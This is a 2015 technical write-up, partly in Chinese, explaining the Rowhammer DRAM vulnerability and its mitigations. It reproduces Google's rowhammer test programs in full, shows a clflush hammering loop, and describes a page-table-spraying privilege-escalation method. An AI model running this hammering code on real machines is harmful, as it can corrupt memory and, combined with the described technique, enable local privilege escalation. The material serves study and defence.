目錄
1. Rowhammer Introduction 2. Rowhammer Principle 3. Track And Fix
1. rowhammer introduction
今天的DRAM單元為了讓記憶體容量更大,所以在物理密度上更緊湊,但這樣很難阻止臨近的記憶體單元之間的電子上的互相影響,在足夠多的訪問次數後可以讓某個單元的值從1變成0,或者相反
code example
code1a: mov (X), %eax // Read from address X mov (Y), %ebx // Read from address Y clflush (X) // Flush cache for address X clflush (Y) // Flush cache for address Y jmp code1a
兩個因素導致位的變化
1. 地址選擇: 地址X和地址Y必須印射到記憶體的不同row但是又是在同一bank上,即相鄰行 每個DRAM晶片包含了很多行(row)的單元。訪問一個byte在記憶體中涉及到將資料從row傳輸到晶片的"row buffer"中(放電操作),當讀取或者寫入row buffer的內容後,再把row buffer內容傳輸到原來的row單元裡(充電操作)。這種"啟用"一個row的操作(放電和充電)可以干擾到臨近的row。如果這樣做足夠多的次數,臨近row的自動重新整理操作(一般是每64ms)可能會讓臨近row的位產生變化。 row buffer作為快取,如果地址X和Y指向相同的row,那code1a將會從row buffer中讀取資訊而不用任何"啟用"操作 每個DRAM的bank都有自己的"當前已啟用的row",所以如果地址X和地址Y指向不同的bank,code1a將會從那些bank的row buffer中讀取資訊而不用反覆的啟用row。所以,如果地址X和地址Y指向同一bank上不同的row,code1a會導致X和Y不斷的被啟用,這被稱為ROWHAMMERING 3. 繞過快取: 沒有了code1a中的CLFLUSH指令的話,記憶體讀操作(mov)只會操作CPU的快取記憶體。CLFLUSH重新整理快取的操作強制讓記憶體的訪問直接指向DRAM,而這會導致不斷有row被重複的啟用
The new research by Google shows that these types of errors can be introduced in a predictable manner. A proof-of-concept (POC) exploit that runs on the Linux operating system has been released. Successful exploitation leverages the predictability of these Row Hammer errors to modify memory of an affected device. An authenticated, local attacker with the ability to execute code on the affected system could elevate their privileges to that of a super user or “root” account. This is also known as Ring 0. Programs that run in Ring 0 can modify anything on the affected system.
Relevant Link:
http://linux.cn/article-5030-qqmail.html http://www.ddrdetective.com/row-hammer/
2. Rowhammer Principle
0x1: Dynamic random-access memory (DRAM)
Dynamic random-access memory (DRAM) contains a two-dimensional array of cells.
在每個儲存單元有一個電容器和一個存取電晶體。二進位制資料值的兩個狀態通過電容器的完全充電和完全放電來分別表示
Memory disturbance errors can occur in cases where there is an abnormal interaction between two circuit components that should be isolated from each other. Historically, these memory disturbance errors have been demonstrated by repeatedly accessing (opening, reading, and closing) the same row of memory. This is discussed in detail in the research paper titled
0x2: Privilege Escalation Experiment
the test leverages row hammering to induce a bit flip in a page table entry (PTE) which forces the PTE to point to a physical page containing a page table of the attacking process.
The research uses the concept of memory spraying with the POSIX-compliant Unix system call that maps files or devices into memory — mmap() . The attacker could spray most of physical memory with page tables by using the mmap() system call to a single file repeatedly.
The tests were done with non-ECC memory using the CLFLUSH instruction with a “random address selection” methodology also described in their post.
./make.sh
./rowhammer_test
0x3: Code Analysis
rowhammer_test.cc
#define __STDC_FORMAT_MACROS #include <assert.h> #include <inttypes.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <sys/time.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> const size_t mem_size = 1 << 30; const int toggles = 540000; char *g_mem; char *pick_addr() { size_t offset = (rand() << 12) % mem_size; return g_mem + offset; } class Timer { struct timeval start_time_; public: Timer() { // Note that we use gettimeofday() (with microsecond resolution) // rather than clock_gettime() (with nanosecond resolution) so // that this works on Mac OS X, because OS X doesn't provide // clock_gettime() and we don't really need nanosecond resolution. int rc = gettimeofday(&start_time_, NULL); assert(rc == 0); } double get_diff() { struct timeval end_time; int rc = gettimeofday(&end_time, NULL); assert(rc == 0); return (end_time.tv_sec - start_time_.tv_sec + (double) (end_time.tv_usec - start_time_.tv_usec) / 1e6); } void print_iters(uint64_t iterations) { double total_time = get_diff(); double iter_time = total_time / iterations; printf(" %.3f nanosec per iteration: %g sec for %" PRId64 " iterations\n", iter_time * 1e9, total_time, iterations); } }; //讀取指定長度的記憶體bit位,即觸發"放電操作" static void toggle(int iterations, int addr_count) { Timer t; for (int j = 0; j < iterations; j++) { uint32_t *addrs[addr_count]; for (int a = 0; a < addr_count; a++) { //選取不同row,但是同一bank的記憶體bit,可能並不一定是相鄰行 addrs[a] = (uint32_t *) pick_addr(); } uint32_t sum = 0; //迴圈toggles = 540000次,進行實體記憶體讀取 for (int i = 0; i < toggles; i++) { for (int a = 0; a < addr_count; a++) { //讀取addr_count長度的記憶體塊 sum += *addrs[a] + 1; } for (int a = 0; a < addr_count; a++) { //清除addr_count長度記憶體塊的對應的CPU快取記憶體 asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory"); } } // Sanity check. We don't expect this to fail, because reading // these rows refreshes them. if (sum != 0) { printf("error: sum=%x\n", sum); exit(1); } } t.print_iters(iterations * addr_count * toggles); } void main_prog() { g_mem = (char *) mmap(NULL, mem_size, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); assert(g_mem != MAP_FAILED); printf("clear\n"); //初始化對應的記憶體區( [g_mem ~ g_mem + mem_size] )為初始值: 0XFF memset(g_mem, 0xff, mem_size); Timer t; int iter = 0; //無限迴圈,在大多數時候,需要觸發這個漏洞需要較多的嘗試 for (;;) { printf("Iteration %i (after %.2fs)\n", iter++, t.get_diff()); //迴圈10次,每次8byte記憶體單位 toggle(10, 8); Timer check_timer; printf("check\n"); uint64_t *end = (uint64_t *) (g_mem + mem_size); uint64_t *ptr; int errors = 0; for (ptr = (uint64_t *) g_mem; ptr < end; ptr++) { uint64_t got = *ptr; if (got != ~(uint64_t) 0) { printf("error at %p: got 0x%" PRIx64 "\n", ptr, got); errors++; } } printf(" (check took %fs)\n", check_timer.get_diff()); if (errors) exit(1); } } int main() { // In case we are running as PID 1, we fork() a subprocess to run // the test in. Otherwise, if process 1 exits or crashes, this will // cause a kernel panic (which can cause a reboot or just obscure // log output and prevent console scrollback from working). int pid = fork(); if (pid == 0) { main_prog(); _exit(1); } int status; if (waitpid(pid, &status, 0) == pid) { printf("** exited with status %i (0x%x)\n", status, status); } for (;;) { sleep(999); } return 0; }
double_sided_rowhammer.cc
// Small test program to systematically check through the memory to find bit // flips by double-sided row hammering. // // Compilation instructions: // g++ -std=c++11 [filename] // // ./double_sided_rowhammer [-t nsecs] [-p percentage] // // Hammers for nsecs seconds, acquires the described fraction of memory (0.0 to 0.9 or so). #include <asm/unistd.h> #include <assert.h> #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <linux/kernel-page-flags.h> #include <map> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string> #include <string.h> #include <sys/ioctl.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/sysinfo.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #include <vector> // The fraction of physical memory that should be mapped for testing. double fraction_of_physical_memory = 0.3; // The time to hammer before aborting. Defaults to one hour. uint64_t number_of_seconds_to_hammer = 3600; // The number of memory reads to try. uint64_t number_of_reads = 1000*1024; // Obtain the size of the physical memory of the system. uint64_t GetPhysicalMemorySize() { struct sysinfo info; sysinfo( &info ); return (size_t)info.totalram * (size_t)info.mem_unit; } // If physical_address is in the range, put (physical_address, virtual_address) // into the map. bool PutPointerIfInAddressRange(const std::pair<uint64_t, uint64_t>& range, uint64_t physical_address, uint8_t* virtual_address, std::map<uint64_t, uint8_t*>& pointers) { if (physical_address >= range.first && physical_address <= range.second) { printf("[!] Found desired physical address %lx at virtual %lx\n", (uint64_t)physical_address, (uint64_t)virtual_address); pointers[physical_address] = virtual_address; return true; } return false; } bool IsRangeInMap(const std::pair<uint64_t, uint64_t>& range, const std::map<uint64_t, uint8_t*>& mapping) { for (uint64_t check = range.first; check <= range.second; check += 0x1000) { if (mapping.find(check) == mapping.end()) { printf("[!] Failed to find physical memory at %lx\n", check); return false; } } return true; } uint64_t GetPageFrameNumber(int pagemap, uint8_t* virtual_address) { // Read the entry in the pagemap. uint64_t value; int got = pread(pagemap, &value, 8, (reinterpret_cast<uintptr_t>(virtual_address) / 0x1000) * 8); assert(got == 8); uint64_t page_frame_number = value & ((1ULL << 54)-1); return page_frame_number; } void SetupMapping(uint64_t* mapping_size, void** mapping) { *mapping_size = static_cast<uint64_t>((static_cast<double>(GetPhysicalMemorySize()) * fraction_of_physical_memory)); *mapping = mmap(NULL, *mapping_size, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); assert(*mapping != (void*)-1); // Initialize the mapping so that the pages are non-empty. printf("[!] Initializing large memory mapping ..."); for (uint64_t index = 0; index < *mapping_size; index += 0x1000) { uint64_t* temporary = reinterpret_cast<uint64_t*>( static_cast<uint8_t*>(*mapping) + index); temporary[0] = index; } printf("done\n"); } // Build a memory mapping that is big enough to cover all of physical memory. bool GetMappingsForPhysicalRanges( const std::pair<uint64_t, uint64_t>& physical_range_A_to_hammer, std::map<uint64_t, uint8_t*>& pointers_to_hammer_A, const std::pair<uint64_t, uint64_t>& physical_range_B_to_hammer, std::map<uint64_t, uint8_t*>& pointers_to_hammer_B, const std::pair<uint64_t, uint64_t>& physical_range_to_check, std::map<uint64_t, uint8_t*>& pointers_to_range_to_check, void** out_mapping) { uint64_t mapping_size; void* mapping; SetupMapping(&mapping_size, &mapping); int pagemap = open("/proc/self/pagemap", O_RDONLY); assert(pagemap >= 0); // Don't assert if opening this fails, the code needs to run under usermode. int kpageflags = open("/proc/kpageflags", O_RDONLY); // Iterate over the entire mapping, identifying the physical addresses for // each 4k-page. for (uint64_t offset = 0; offset < mapping_size; offset += 0x1000) { uint8_t* virtual_address = static_cast<uint8_t*>(mapping) + offset; uint64_t page_frame_number = GetPageFrameNumber(pagemap, virtual_address); // Read the flags for this page if we have access to kpageflags. uint64_t page_flags = 0; if (kpageflags >= 0) { int got = pread(kpageflags, &page_flags, 8, page_frame_number * 8); assert(got == 8); } uint64_t physical_address; if (page_flags & KPF_HUGE) { printf("[!] %lx is on huge page\n", (uint64_t)virtual_address); physical_address = (page_frame_number * 0x1000) + (reinterpret_cast<uintptr_t>(virtual_address) & (0x200000-1)); } else { physical_address = (page_frame_number * 0x1000) + (reinterpret_cast<uintptr_t>(virtual_address) & 0xFFF); } //printf("[!] %lx is %lx\n", (uint64_t)virtual_address, // (uint64_t)physical_address); PutPointerIfInAddressRange(physical_range_A_to_hammer, physical_address, virtual_address, pointers_to_hammer_A); PutPointerIfInAddressRange(physical_range_B_to_hammer, physical_address, virtual_address, pointers_to_hammer_B); PutPointerIfInAddressRange(physical_range_to_check, physical_address, virtual_address, pointers_to_range_to_check); } // Check if all physical addresses the caller asked for are in the resulting // map. if (IsRangeInMap(physical_range_A_to_hammer, pointers_to_hammer_A) && IsRangeInMap(physical_range_B_to_hammer, pointers_to_hammer_B) && IsRangeInMap(physical_range_to_check, pointers_to_range_to_check)) { return true; } return false; } uint64_t HammerAddressesStandard( const std::pair<uint64_t, uint64_t>& first_range, const std::pair<uint64_t, uint64_t>& second_range, uint64_t number_of_reads) { volatile uint64_t* first_pointer = reinterpret_cast<uint64_t*>(first_range.first); volatile uint64_t* second_pointer = reinterpret_cast<uint64_t*>(second_range.first); uint64_t sum = 0; while (number_of_reads-- > 0) { sum += first_pointer[0]; sum += second_pointer[0]; asm volatile( "clflush (%0);\n\t" "clflush (%1);\n\t" : : "r" (first_pointer), "r" (second_pointer) : "memory"); } return sum; } typedef uint64_t(HammerFunction)( const std::pair<uint64_t, uint64_t>& first_range, const std::pair<uint64_t, uint64_t>& second_range, uint64_t number_of_reads); // A comprehensive test that attempts to hammer adjacent rows for a given // assumed row size (and assumptions of sequential physical addresses for // various rows. uint64_t HammerAllReachablePages(uint64_t presumed_row_size, void* memory_mapping, uint64_t memory_mapping_size, HammerFunction* hammer, uint64_t number_of_reads) { // This vector will be filled with all the pages we can get access to for a // given row size. std::vector<std::vector<uint8_t*>> pages_per_row; uint64_t total_bitflips = 0; pages_per_row.resize(memory_mapping_size / presumed_row_size); int pagemap = open("/proc/self/pagemap", O_RDONLY); assert(pagemap >= 0); printf("[!] Identifying rows for accessible pages ... "); for (uint64_t offset = 0; offset < memory_mapping_size; offset += 0x1000) { uint8_t* virtual_address = static_cast<uint8_t*>(memory_mapping) + offset; uint64_t page_frame_number = GetPageFrameNumber(pagemap, virtual_address); uint64_t physical_address = page_frame_number * 0x1000; uint64_t presumed_row_index = physical_address / presumed_row_size; //printf("[!] put va %lx pa %lx into row %ld\n", (uint64_t)virtual_address, // physical_address, presumed_row_index); if (presumed_row_index > pages_per_row.size()) { pages_per_row.resize(presumed_row_index); } pages_per_row[presumed_row_index].push_back(virtual_address); //printf("[!] done\n"); } printf("Done\n"); // We should have some pages for most rows now. for (uint64_t row_index = 0; row_index + 2 < pages_per_row.size(); ++row_index) { if ((pages_per_row[row_index].size() != 64) || (pages_per_row[row_index+2].size() != 64)) { printf("[!] Can't hammer row %ld - only got %ld/%ld pages " "in the rows above/below\n", row_index+1, pages_per_row[row_index].size(), pages_per_row[row_index+2].size()); continue; } else if (pages_per_row[row_index+1].size() == 0) { printf("[!] Can't hammer row %ld, got no pages from that row\n", row_index+1); continue; } printf("[!] Hammering rows %ld/%ld/%ld of %ld (got %ld/%ld/%ld pages)\n", row_index, row_index+1, row_index+2, pages_per_row.size(), pages_per_row[row_index].size(), pages_per_row[row_index+1].size(), pages_per_row[row_index+2].size()); // Iterate over all pages we have for the first row. for (uint8_t* first_row_page : pages_per_row[row_index]) { // Iterate over all pages we have for the second row. for (uint8_t* second_row_page : pages_per_row[row_index+2]) { // Set all the target pages to 0xFF. for (uint8_t* target_page : pages_per_row[row_index+1]) { memset(target_page, 0xFF, 0x1000); } // Now hammer the two pages we care about. std::pair<uint64_t, uint64_t> first_page_range( reinterpret_cast<uint64_t>(first_row_page), reinterpret_cast<uint64_t>(first_row_page+0x1000)); std::pair<uint64_t, uint64_t> second_page_range( reinterpret_cast<uint64_t>(second_row_page), reinterpret_cast<uint64_t>(second_row_page+0x1000)); hammer(first_page_range, second_page_range, number_of_reads); // Now check the target pages. uint64_t number_of_bitflips_in_target = 0; for (const uint8_t* target_page : pages_per_row[row_index+1]) { for (uint32_t index = 0; index < 0x1000; ++index) { if (target_page[index] != 0xFF) { ++number_of_bitflips_in_target; } } } if (number_of_bitflips_in_target > 0) { printf("[!] Found %ld flips in row %ld (%lx to %lx) when hammering " "%lx and %lx\n", number_of_bitflips_in_target, row_index+1, ((row_index+1)*presumed_row_size), ((row_index+2)*presumed_row_size)-1, GetPageFrameNumber(pagemap, first_row_page)*0x1000, GetPageFrameNumber(pagemap, second_row_page)*0x1000); total_bitflips += number_of_bitflips_in_target; } } } } return total_bitflips; } //Hammer所有可訪問的實體記憶體行 void HammerAllReachableRows(HammerFunction* hammer, uint64_t number_of_reads) { uint64_t mapping_size; void* mapping; SetupMapping(&mapping_size, &mapping); HammerAllReachablePages(1024*256, mapping, mapping_size, hammer, number_of_reads); } void HammeredEnough(int sig) { printf("[!] Spent %ld seconds hammering, exiting now.\n", number_of_seconds_to_hammer); fflush(stdout); fflush(stderr); exit(0); } int main(int argc, char** argv) { // Turn off stdout buffering when it is a pipe. setvbuf(stdout, NULL, _IONBF, 0); int opt; while ((opt = getopt(argc, argv, "t:p:")) != -1) { switch (opt) { case 't': number_of_seconds_to_hammer = atoi(optarg); break; case 'p': fraction_of_physical_memory = atof(optarg); break; default: fprintf(stderr, "Usage: %s [-t nsecs] [-p percent]\n", argv[0]); exit(EXIT_FAILURE); } } signal(SIGALRM, HammeredEnough); printf("[!] Starting the testing process...\n"); alarm(number_of_seconds_to_hammer); HammerAllReachableRows(&HammerAddressesStandard, number_of_reads); }
Relevant Link:
http://en.wikipedia.org/wiki/Dynamic_random-access_memory http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf https://github.com/google/rowhammer-test http://en.wikipedia.org/wiki/Row_hammer
3. Track And Fix
This vulnerability exists within hardware and cannot be mitigated by just upgrading software. The following are the widely known mitigations for the Row Hammer issue:
1. Two times (2x) refresh is a mitigation that has been commonly implemented on server based chipsets from Intel since the introduction of Sandy Bridge and is the suggested default. This reduces the row refresh time by the memory controller from 64ms to 32ms and shrinks the potential window for a row hammer, or other gate pass type memory error to be introduced. 2. Pseudo Target Row Refresh (pTRR) available in modern memory and chipsets. pTRR does not introduce any performance and power impact. 3. Increased Patrol Scub timers systems that are equipped with ECC memory will often have a BIOS option that allows the administrator to set an interval at which the CPU will utilize the checksum data stored on each ECC DIMM module to ensure that the contents of memory are valid, and correcting any bit errors that may have been introduced. The number of correctable errors will vary based on architecture and ECC variant. Administrator’s may consider reducing the patrol scrub timers from the standard 20 minute interval to a lower value.
Relevant Link:
http://www.ddrdetective.com/files/3314/1036/5702/Description_of_the_Row_Hammer_feature_on_the_FS2800_DDR_Detective.pdf http://blogs.cisco.com/security/mitigations-available-for-the-dram-row-hammer-vulnerability
Copyright (c) 2015 LittleHann All rights reserved